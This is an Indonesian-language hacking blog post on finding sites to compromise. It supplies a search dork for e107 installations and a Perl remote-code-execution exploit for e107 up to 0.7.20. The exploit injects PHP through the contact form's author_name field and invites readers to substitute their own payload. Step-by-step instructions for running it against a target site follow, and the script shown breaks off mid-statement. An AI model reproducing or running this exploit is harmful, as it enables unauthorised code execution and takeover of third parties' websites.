Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah 
Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl” # Exploit Title: e107 Code Exec
# Software Link: http://e107.org/edownload.php |
# Version: e107 <= 0.7.20 |
# Tested on: Linux/Windows |
################################################# |
# e107 Code Exec // SploitAuthor: McFly@e107.org |
################################################# |
# These scrubs still haven't released an update! |
# Here is a little bit of motivation for them to |
# patch one of the most popular, and insecure of |
# the PHP web apps available today. |
################################################# |
# DORK: inurl:e107_plugins |
################################################# |
my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n"); |
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here! |
# Remove comment for proxy support |
my $proxy = 'http://127.0.0.1:8118/'; |
$ENV{http_proxy} = $proxy ? $proxy: 0; |
$ua = new LWP::UserAgent; |
$ua->agent("Mozilla/5.0"); |
print "[*] Using proxy $proxy \n"; |
my $req = new HTTP::Request POST => $path; |
$req->content_type('application/x-www-form-urlencoded'); |
$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D"); |
my $res = $ua->request($req); |
my $data = $res->as_string; |
if ( $data =~ /<td class=["']main_section['"]>(.*)/ ) |
Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php
Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:
Lihat Videonya Disini: HERE
Download it: HERE
